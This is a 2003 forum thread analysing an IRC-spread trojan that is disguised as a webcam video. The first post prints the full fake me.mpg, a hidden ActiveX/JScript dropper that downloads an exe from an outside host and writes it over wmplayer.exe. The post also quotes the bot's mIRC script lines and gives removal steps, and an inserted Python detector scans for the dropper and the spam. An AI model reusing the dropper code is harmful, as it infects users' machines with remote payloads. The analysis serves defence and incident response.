LiquidIce
Nov 12 2003, 02:34 AM
Basic run down of the fyle backdoor/virus
By LiquidIce
admin@infoslash.org
http://www.infoslash.org
We've been getting hit a lot with PM messages on IRC:
saying "<}z_}> Come watch me on my webcam and chat /w me :-) http://*.*.*.*.*.*:3837/me.mpg"
So I downloaded the file and this seems to be a Windows Media exploit.
I downloaded the .mpg and opened it with my favourite Linux text editor, and here is what it contains:
| CODE |
<html>
<h1>Loading Video<br>Please Wait</h1>
<h3>If video doesn't load within 30 seconds, then your media player is incompatible.<br>
You can download the latest windows media player from
<a href="http://www.microsoft.com/windows/windowsmedia/download/default.asp">http://www.microsoft.com/windows/windowsmedia/download/default.asp</a></h3>

<!-- Hidden payload: JScript that fetches the exe over XMLHTTP and writes it over wmplayer.exe -->
<textarea id="code" style="display:none;">
var x = new ActiveXObject("Microsoft.XMLHTTP");
x.Open("GET", "http://*.*.*.*:4812/windowsMedia.exe",0);
x.Send();
var s = new ActiveXObject("ADODB.Stream");
s.Mode = 3;
s.Type = 1;
s.Open();
s.Write(x.responseBody);
s.SaveToFile("C:\\Program Files\\Windows Media Player\\wmplayer.exe",2);
location.href = "mms://";
</textarea>

<script language="javascript">
// Escapes the hidden script line by line so it survives being embedded in a javascript: URL
function preparecode(code) {
  result = '';
  lines = code.split(/\r\n/);
  for (i=0;i<lines.length;i++) {
    line = lines[i];
    line = line.replace(/^\s+/,"");
    line = line.replace(/\s+$/,"");
    line = line.replace(/'/g,"\\'");
    line = line.replace(/[\\]/g,"\\\\");
    line = line.replace(/[/]/g,"%2f");
    if (line != '') { result += line +'\\r\\n'; }
  }
  return result;
}
// Evaluates the escaped script via a file:javascript: URL opened in the window named "_media"
function doit() {
  mycode = preparecode(document.all.code.value);
  myURL = "file:javascript:eval('" + mycode + "')";
  window.open(myURL,"_media");
}
// Stray mIRC script line (apparently from the bot's .ini, pasted into the post at this point):
// 'n291= sw PRIVMSG $hget(HNicks,$hget(nickInc,1)) :Come watch me on my webcam and chat /w me :-) http:// $+ $hget(myIP,1) $+ : $+ $hget(httpd,1) $+ /me.mpg'
window.open("error.jsp","_media");
setTimeout("doit()", 5000);
</script>
</html>
|
Basically this is telling WM to download the exe and save it to C:\Program Files\Windows Media Player as
wmplayer.exe. It is then run and executes an error page, so you are led to believe the movie is faulty,
where in fact it's a virus that downloads in the background and is executed. At the moment I haven't taken a look
at the exe or disassembled it, but it looks like it fires open a few ports where it serves itself and then joins
IRC networks spamming the messages to infect more people.
I need to now disassemble the .exe so I can see exactly what the virus/trojan is doing and where it's being controlled
from. I'll post more as I look into this.
-----------------------------
OK, I decompiled the exe and the virus/backdoor trojan or whatever you want to call it was written
by someone calling themself "flye"? (heh, smart guy eh, putting his nick in the damn thing)
OK so let's go into detail with this "EXE".
The EXE has a number of functions.
Not in any order, here's what it does:
unpacks to various files -
fyle.exe [ IRC client / BNC ?? ]
The_Magnificent_Fyle.ini [ The IRC config file with server addresses, name to use etc.
I use Linux so I'm not able to infect myself to see this in full detail ]
me.mpg [ Does this need explaining? This is what is being spammed on the IRC networks & contains
the above code ]
tmp.bat [ The .bat file that sets the complete process off ]
IF YOU RUN AN IRC NETWORK YOU MUST BE AWARE THAT THIS VIRUS/TROJAN/BACKDOOR REGISTERS ITSELF
ON YOUR NETWORK. THIS IS FOUND IN THE FOLLOWING CODE:
'n86= sw PRIVMSG nickserv :register $prnick(1) $+ $prnick(1) $prnick(1) $+ @hotmail.com'
MAYBE A BLOCK SHOULD BE SET TO STOP @HOTMAIL ADDRESSES REGISTERING NEW NICKS?
From what I can see, this only connects to port 6667.
Seen in this line: 'n532= if (%tmp == 0) sockopen findIP irc.undernet.org 6667'
So closing off port 6667 might be a good idea, or putting up a dummy ircd on the port
with a warning/notice to real users to connect to a different port. If you downloaded this file from
somewhere on the net it will contain a few files to create the dummy ircd.
[ credits for deflye.sh go to the staff @ irc.mysteria.net for the original file, which I just edited ]
dummy-ircd.c DOES NOT LOG - WHILE deflye.sh DOES LOG
This virus/backdoor is going around infecting people to create BNCs for a channel on irc.undernet.org.
*Sigh*
This is found on line 22,996:
'n607= sockwrite -n undernet TOPIC $hget(undernet,2) :Free BnC Courtesy of Fyle: /server -m $hget(myIP,1) $sock(bncListen).port'
I'm not going to go into any more details with this as I've no need to. The me.mpg & windowsMedia.exe
are with these files but packed into a zip so you don't infect yourself.
!!! SO BE WARNED !!!
Greetz
LiquidIce
admin@infoslash.org
I've attached the code for others to run through.
*NOTE*
THE VIRUS/BACKDOOR IS IN /VIRUS/
Is this detected? No - I've contacted F-Secure and they are analysing the files I've submitted + a report I sent.
How do I protect myself? Don't open any movie links/mpgs that you are not sure of, common sense really.
What if I'm infected? Open regedit, go to HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run & delete the "flye" entry. Also go into your Windows Media dir and the sounds dir and delete The_Magnificent_Fyle.ini, flye.exe - which could also be in Fsounds & f.reg + temp.bat and any other junk it might have dumped in there.
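As an added example (not code from the post or the bot), a small Python detector for the two things described above: recognising a downloaded "me.mpg" that is really the HTML/ActiveX dropper rather than an MPEG stream, and flagging the bot's lure PM and NickServ self-registration in IRC server logs. The sample file and log lines are constructed, and the hosts are placeholder addresses.

```python
import re

# Constructed sample of a "me.mpg" that is really the HTML/JScript dropper quoted in the post
# (the host is a placeholder address).
SAMPLE_MPG = rb"""<html><h1>Loading Video<br>Please Wait</h1>
<textarea id="code" style="display:none;">
var x = new ActiveXObject("Microsoft.XMLHTTP");
x.Open("GET", "http://192.0.2.10:4812/windowsMedia.exe",0); x.Send();
var s = new ActiveXObject("ADODB.Stream"); s.Mode = 3; s.Type = 1; s.Open();
s.Write(x.responseBody);
s.SaveToFile("C:\\Program Files\\Windows Media Player\\wmplayer.exe",2);
</textarea></html>"""

# Constructed IRC server log lines: the lure PM, the NickServ self-registration, and a normal message.
SAMPLE_IRC = [
    ":zx_z!~zx@198.51.100.7 PRIVMSG someone :Come watch me on my webcam and chat /w me :-) http://192.0.2.10:3837/me.mpg",
    ":zx_z!~zx@198.51.100.7 PRIVMSG nickserv :register zx_zzx_z zx_z@hotmail.com",
    ":alice!~a@203.0.113.5 PRIVMSG #linux :anyone tried the new kernel?",
]

# Strings that all appear in the dropper's hidden <textarea>: the download and write-to-disk calls.
ACTIVEX_MARKERS = ("Microsoft.XMLHTTP", "ADODB.Stream", "SaveToFile(")

def classify_media_file(data: bytes) -> str:
    """Classify a supposed .mpg download as 'mpeg', 'activex-dropper' or 'unknown'."""
    # Real MPEG-1/2 streams start with a pack header (00 00 01 BA) or video sequence header (00 00 01 B3).
    if data[:4] in (b"\x00\x00\x01\xba", b"\x00\x00\x01\xb3"):
        return "mpeg"
    text = data.decode("latin-1")
    if "<html" in text.lower() and all(marker in text for marker in ACTIVEX_MARKERS):
        return "activex-dropper"
    return "unknown"

# The lure text with its /me.mpg URL, and the NickServ registration using a nick@hotmail.com address.
LURE_RE = re.compile(r"PRIVMSG\s+\S+\s+:Come watch me on my webcam.*?(http://\S+/me\.mpg)", re.I)
REGISTER_RE = re.compile(r"PRIVMSG\s+nickserv\s+:register\s+\S+\s+(\S+@hotmail\.com)", re.I)

def scan_irc_lines(lines):
    """Return (kind, nick, detail) tuples for lines matching the lure spam or self-registration."""
    hits = []
    for line in lines:
        nick = line.split("!", 1)[0].lstrip(":")   # nick from the ":nick!user@host" prefix
        lure = LURE_RE.search(line)
        if lure:
            hits.append(("lure", nick, lure.group(1)))
        reg = REGISTER_RE.search(line)
        if reg:
            hits.append(("register", nick, reg.group(1)))
    return hits
```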
crackie
Nov 12 2003, 06:39 AM
thx 4 info

I was wondering why such guys spam on IRC, now I know.
Mouse
Nov 14 2003, 03:09 PM
I'm network admin on an IRC network. I had a run-in with 'BNC Bots' and I know that guy on Undernet by the nicks in the mIRC files.
I went on Undernet under some bot's nick and watched their botnets.
Apparently they use some hosts for BNCs and trivia bots.
I have other files that I have downloaded from some of his bots.
I remembered that guy named flyre or fyre on that network.
No DDoS or packets in files.
I'm sure we still have a channel named #bnc.